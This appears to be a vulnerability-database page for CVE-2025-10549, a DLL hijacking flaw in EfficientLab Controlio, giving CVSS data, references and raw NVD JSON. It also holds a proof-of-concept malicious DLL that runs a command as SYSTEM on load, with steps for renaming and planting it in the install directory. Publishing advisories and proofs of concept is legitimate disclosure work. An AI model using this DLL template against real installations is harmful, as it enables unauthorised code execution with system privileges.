CVE-2025-10549

Description

EfficientLab Controlio before v1.3.95 contains a DLL hijacking vulnerability caused by weak folder permissions in the installation directory. A local attacker can place a specially crafted DLL in this directory and achieve arbitrary code execution with highest privileges, because the affected service runs as NT AUTHORITY\SYSTEM.

CVSS Details

CVSS Score

5.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

EfficientLab Controlio < v1.3.95

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Compile: x86_64-w64-mingw32-g++ -shared -o hijack.dll payload.cpp
#include <windows.h>
#include <stdlib.h>

// DllMain entry point
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Execution starts here when the DLL is loaded
        // Example: Create a file as proof of execution (runs as NT AUTHORITY\SYSTEM)
        system("cmd.exe /c echo PoC Execution > C:\\Windows\\Temp\\cve_2025_10549.txt");
        // Practical attack: WinExec("calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/*
Instructions:
1. Identify the missing DLL name the application tries to load (e.g., using Process Monitor).
2. Rename the compiled 'hijack.dll' to the identified DLL name.
3. Place the malicious DLL in the Controlio installation directory.
4. Restart the Controlio service or trigger the application flow.
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10549
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10549
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10549/
[4] VulDB https://vuldb.com/cve/CVE-2025-10549
[5] https://kb.controlio.net/hc/en-us/articles/45777908471185-Client-Update-April-15-2026-ver-1-3-95
[6] https://r.sec-consult.com/controlio
[7] http://seclists.org/fulldisclosure/2026/Apr/19

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10549", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2026-04-23T07:16:39.720", "lastModified": "2026-05-19T15:35:04.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EfficientLab Controlio before v1.3.95 contains a DLL hijacking vulnerability caused by weak folder permissions in the installation directory. A local attacker can place a specially crafted DLL in this directory and achieve arbitrary code execution with highest privileges, because the affected service runs as NT AUTHORITY\\SYSTEM."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://kb.controlio.net/hc/en-us/articles/45777908471185-Client-Update-April-15-2026-ver-1-3-95", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "https://r.sec-consult.com/controlio", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "http://seclists.org/fulldisclosure/2026/Apr/19", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}